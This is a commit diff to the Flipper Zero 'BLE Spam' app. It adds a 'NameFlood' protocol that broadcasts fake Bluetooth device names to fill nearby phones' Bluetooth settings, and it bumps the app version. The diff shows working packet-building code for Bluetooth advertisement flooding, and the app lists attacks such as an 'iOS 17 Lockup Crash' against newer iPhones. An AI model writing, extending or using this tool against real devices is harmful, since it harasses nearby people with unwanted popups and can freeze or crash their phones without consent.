upd blespam

ReadMe.md

@@ -89,7 +89,7 @@ The Flipper and its community wouldn't be as rich as it is without your contribu
 | Metronome | ![Media Badge] | [by panki27](https://github.com/panki27/Metronome) |  | [![UFW Badge]](https://lab.flipper.net/apps/metronome) |
 | Morse Code | ![Media Badge] | [by wh00hw](https://github.com/wh00hw/MorseCodeFAP) |  | [![UFW Badge]](https://lab.flipper.net/apps/morse_code) |
 | **BadKB** plugin | ![Tools Badge] | [by Willy-JL, ClaraCrazy, XFW contributors](https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/main/bad_kb) | BadKB (aka BadUSB via Bluetooth) | ![None Badge] |
-| BLE Spam | ![BT Badge] | [by @Willy-JL & @ECTO-1A & @Spooks4576](https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/external/ble_spam) |  | ![None Badge] |
+| BLE Spam | ![BT Badge] | [by @Willy-JL & @ECTO-1A & @Spooks4576](https://github.com/Next-Flip/Momentum-Apps/tree/dev/ble_spam) |  | ![None Badge] |
 
 ### Games
 

base_pack/ble_spam/application.fam

@@ -7,8 +7,8 @@ App(
     fap_icon="ble_spam_10px.png",
     fap_category="Bluetooth",
     fap_author="@Willy-JL @ECTO-1A @Spooks4576",
-    fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam",
-    fap_version="5.1",
+    fap_weburl="https://github.com/Next-Flip/Momentum-Apps/tree/dev/ble_spam",
+    fap_version="6.0",
     fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications",
     fap_icon_assets="icons",
     fap_icon_assets_symbol="ble_spam",

base_pack/ble_spam/ble_spam.c

@@ -24,6 +24,16 @@ static Attack attacks[] = {
                 .cfg = {},
             },
     },
+    {
+        .title = "BT Settings Flood",
+        .text = "Fills available BT devices",
+        .protocol = &protocol_nameflood,
+        .payload =
+            {
+                .random_mac = true,
+                .cfg.nameflood = {},
+            },
+    },
     {
         .title = "iOS 17 Lockup Crash",
         .text = "Newer iPhones, long range",
@@ -219,6 +229,9 @@ static int32_t adv_thread(void* _ctx) {
     const Protocol* protocol = attacks[state->index].protocol;
     if(!payload->random_mac) randomize_mac(state);
     if(state->ctx.led_indicator) start_blink(state);
+    if(furi_hal_bt_extra_beacon_is_active()) {
+        furi_check(furi_hal_bt_extra_beacon_stop());
+    }
 
     while(state->advertising) {
         if(protocol && payload->mode == PayloadModeBruteforce &&
@@ -231,7 +244,7 @@ static int32_t adv_thread(void* _ctx) {
         start_extra_beacon(state);
 
         furi_thread_flags_wait(true, FuriFlagWaitAny, delays[state->delay]);
-        furi_hal_bt_extra_beacon_stop();
+        furi_check(furi_hal_bt_extra_beacon_stop());
     }
 
     if(state->ctx.led_indicator) stop_blink(state);
@@ -387,10 +400,10 @@ static void draw_callback(Canvas* canvas, void* _ctx) {
             48,
             AlignLeft,
             AlignTop,
-            "App+Spam: \e#WillyJL\e# XFW\n"
+            "App+Spam: \e#WillyJL\e#\n"
             "Apple+Crash: \e#ECTO-1A\e#\n"
             "Android+Win: \e#Spooks4576\e#\n"
-            "                                   Version \e#5.1\e#",
+            "                                   Version \e#" FAP_VERSION "\e#",
             false);
         break;
     default: {
@@ -481,12 +494,14 @@ static bool input_callback(InputEvent* input, void* _ctx) {
         consumed = true;
         state->lock_warning = true;
         if(state->lock_count == 0) {
+            furi_timer_set_thread_priority(FuriTimerThreadPriorityElevated);
             furi_timer_start(state->lock_timer, 1000);
         }
         if(input->type == InputTypeShort && input->key == InputKeyBack) {
             state->lock_count++;
         }
         if(state->lock_count >= 3) {
+            furi_timer_set_thread_priority(FuriTimerThreadPriorityElevated);
             furi_timer_start(state->lock_timer, 1);
         }
     } else if(
@@ -552,13 +567,16 @@ static bool input_callback(InputEvent* input, void* _ctx) {
                 if(!advertising) {
                     Payload* payload = &attacks[state->index].payload;
                     if(input->type == InputTypeLong && !payload->random_mac) randomize_mac(state);
+                    if(furi_hal_bt_extra_beacon_is_active()) {
+                        furi_check(furi_hal_bt_extra_beacon_stop());
+                    }
 
                     start_extra_beacon(state);
 
                     if(state->ctx.led_indicator)
                         notification_message(state->ctx.notification, &solid_message);
                     furi_delay_ms(10);
-                    furi_hal_bt_extra_beacon_stop();
+                    furi_check(furi_hal_bt_extra_beacon_stop());
 
                     if(state->ctx.led_indicator)
                         notification_message_block(state->ctx.notification, &sequence_reset_rgb);
@@ -604,6 +622,7 @@ static void lock_timer_callback(void* _ctx) {
     with_view_model(
         state->main_view, State * *model, { (*model)->lock_warning = false; }, true);
     state->lock_count = 0;
+    furi_timer_set_thread_priority(FuriTimerThreadPriorityNormal);
 }
 
 static void tick_event_callback(void* _ctx) {

base_pack/ble_spam/protocols/_protocols.c

@@ -5,6 +5,7 @@ const Protocol* protocols[] = {
     &protocol_easysetup,
     &protocol_fastpair,
     &protocol_lovespouse,
+    &protocol_nameflood,
     &protocol_swiftpair,
 };
 

base_pack/ble_spam/protocols/_protocols.h

@@ -4,6 +4,7 @@
 #include "easysetup.h"
 #include "fastpair.h"
 #include "lovespouse.h"
+#include "nameflood.h"
 #include "swiftpair.h"
 
 typedef enum {
@@ -25,6 +26,7 @@ struct Payload {
         EasysetupCfg easysetup;
         FastpairCfg fastpair;
         LovespouseCfg lovespouse;
+        NamefloodCfg nameflood;
         SwiftpairCfg swiftpair;
     } cfg;
 };

base_pack/ble_spam/protocols/_scenes.h

@@ -2,4 +2,5 @@
 #include "easysetup_scenes.h"
 #include "fastpair_scenes.h"
 #include "lovespouse_scenes.h"
+#include "nameflood_scenes.h"
 #include "swiftpair_scenes.h"

base_pack/ble_spam/protocols/fastpair.c

@@ -3,6 +3,7 @@
 
 // Hacked together by @Willy-JL and @Spooks4576
 // Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+// https://bluetoothdb.com
 
 static const struct {
     uint32_t value;
@@ -538,8 +539,6 @@ static const struct {
     {0x87B25F, "Animated Rickroll"},
     {0xF38C02, "Boykisser"},
     {0x1448C9, "BLM"},
-    {0xD5AB33, "Xtreme"},
-    {0x0C0B67, "Xtreme Cta"},
     {0x13B39D, "Talking Sasquach"},
     {0xAA1FE1, "ClownMaster"},
     {0x7C6CDB, "Obama"},
@@ -600,6 +599,7 @@ enum {
     _ConfigExtraStart = ConfigExtraStart,
     ConfigModel,
     ConfigInfoRequire,
+    ConfigInfoPatched,
     ConfigCOUNT,
 };
 static void config_callback(void* _ctx, uint32_t index) {
@@ -611,6 +611,8 @@ static void config_callback(void* _ctx, uint32_t index) {
         break;
     case ConfigInfoRequire:
         break;
+    case ConfigInfoPatched:
+        break;
     default:
         ctx->fallback_config_enter(ctx, index);
         break;
@@ -698,6 +700,8 @@ static void extra_config(Ctx* ctx) {
 
     variable_item_list_add(list, "Requires Google services", 0, NULL, NULL);
 
+    variable_item_list_add(list, "Patched on new Android", 0, NULL, NULL);
+
     variable_item_list_set_enter_callback(list, config_callback, ctx);
 }
 

base_pack/ble_spam/protocols/nameflood.c

@@ -0,0 +1,142 @@
+#include "nameflood.h"
+#include "_protocols.h"
+
+// Hacked together by @Willy-JL
+
+static const char* names[] = {
+    "Assquach💦",
+    "Flipper 🐬",
+    "iOS 17 🍎",
+    "Kink💦",
+    "👉👌",
+    "🔵🦷",
+};
+static const uint8_t names_count = COUNT_OF(names);
+
+static const char* get_name(const Payload* payload) {
+    UNUSED(payload);
+    return "NameFlood";
+}
+
+static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) {
+    NamefloodCfg* cfg = payload ? &payload->cfg.nameflood : NULL;
+
+    const char* name;
+    switch(cfg ? payload->mode : PayloadModeRandom) {
+    case PayloadModeRandom:
+    default:
+        name = names[rand() % names_count];
+        break;
+    case PayloadModeValue:
+        name = cfg->name;
+        break;
+    }
+    uint8_t name_len = strlen(name);
+
+    uint8_t size = 12 + name_len;
+    uint8_t* packet = malloc(size);
+    uint8_t i = 0;
+
+    packet[i++] = 2; // Size
+    packet[i++] = 0x01; // AD Type (Flags)
+    packet[i++] = 0x06; // Flags
+
+    packet[i++] = name_len + 1; // Size
+    packet[i++] = 0x09; // AD Type (Complete Local Name)
+    memcpy(&packet[i], name, name_len); // Device Name
+    i += name_len;
+
+    packet[i++] = 3; // Size
+    packet[i++] = 0x02; // AD Type (Incomplete Service UUID List)
+    packet[i++] = 0x12; // Service UUID (Human Interface Device)
+    packet[i++] = 0x18; // ...
+
+    packet[i++] = 2; // Size
+    packet[i++] = 0x0A; // AD Type (Tx Power Level)
+    packet[i++] = 0x00; // 0dBm
+
+    *_size = size;
+    *_packet = packet;
+}
+
+enum {
+    _ConfigExtraStart = ConfigExtraStart,
+    ConfigName,
+    ConfigInfoSettings,
+    ConfigCOUNT,
+};
+static void config_callback(void* _ctx, uint32_t index) {
+    Ctx* ctx = _ctx;
+    scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
+    switch(index) {
+    case ConfigName:
+        scene_manager_next_scene(ctx->scene_manager, SceneNamefloodName);
+        break;
+    case ConfigInfoSettings:
+        break;
+    default:
+        ctx->fallback_config_enter(ctx, index);
+        break;
+    }
+}
+static void extra_config(Ctx* ctx) {
+    Payload* payload = &ctx->attack->payload;
+    NamefloodCfg* cfg = &payload->cfg.nameflood;
+    VariableItemList* list = ctx->variable_item_list;
+    VariableItem* item;
+
+    item = variable_item_list_add(list, "Display Name", 0, NULL, NULL);
+    variable_item_set_current_value_text(
+        item, payload->mode == PayloadModeRandom ? "Random" : cfg->name);
+
+    variable_item_list_add(list, "See in phone BT settings", 0, NULL, NULL);
+
+    variable_item_list_set_enter_callback(list, config_callback, ctx);
+}
+
+static uint8_t config_count(const Payload* payload) {
+    UNUSED(payload);
+    return ConfigCOUNT - ConfigExtraStart - 1;
+}
+
+const Protocol protocol_nameflood = {
+    .icon = &I_ble_spam,
+    .get_name = get_name,
+    .make_packet = make_packet,
+    .extra_config = extra_config,
+    .config_count = config_count,
+};
+
+static void name_callback(void* _ctx) {
+    Ctx* ctx = _ctx;
+    Payload* payload = &ctx->attack->payload;
+    payload->mode = PayloadModeValue;
+    scene_manager_previous_scene(ctx->scene_manager);
+}
+void scene_nameflood_name_on_enter(void* _ctx) {
+    Ctx* ctx = _ctx;
+    Payload* payload = &ctx->attack->payload;
+    NamefloodCfg* cfg = &payload->cfg.nameflood;
+    TextInput* text_input = ctx->text_input;
+
+    text_input_set_header_text(text_input, "Press back for random");
+
+    text_input_set_result_callback(
+        text_input, name_callback, ctx, cfg->name, sizeof(cfg->name), true);
+
+    text_input_set_minimum_length(text_input, 0);
+
+    view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewTextInput);
+}
+bool scene_nameflood_name_on_event(void* _ctx, SceneManagerEvent event) {
+    Ctx* ctx = _ctx;
+    Payload* payload = &ctx->attack->payload;
+    if(event.type == SceneManagerEventTypeBack) {
+        payload->mode = PayloadModeRandom;
+    }
+    return false;
+}
+void scene_nameflood_name_on_exit(void* _ctx) {
+    Ctx* ctx = _ctx;
+    text_input_reset(ctx->text_input);
+}

base_pack/ble_spam/protocols/nameflood.h

@@ -0,0 +1,10 @@
+#pragma once
+#include "_base.h"
+
+// Hacked together by @Willy-JL
+
+typedef struct {
+    char name[20];
+} NamefloodCfg;
+
+extern const Protocol protocol_nameflood;

base_pack/ble_spam/protocols/nameflood_scenes.h

@@ -0,0 +1 @@
+ADD_SCENE(nameflood_name, NamefloodName)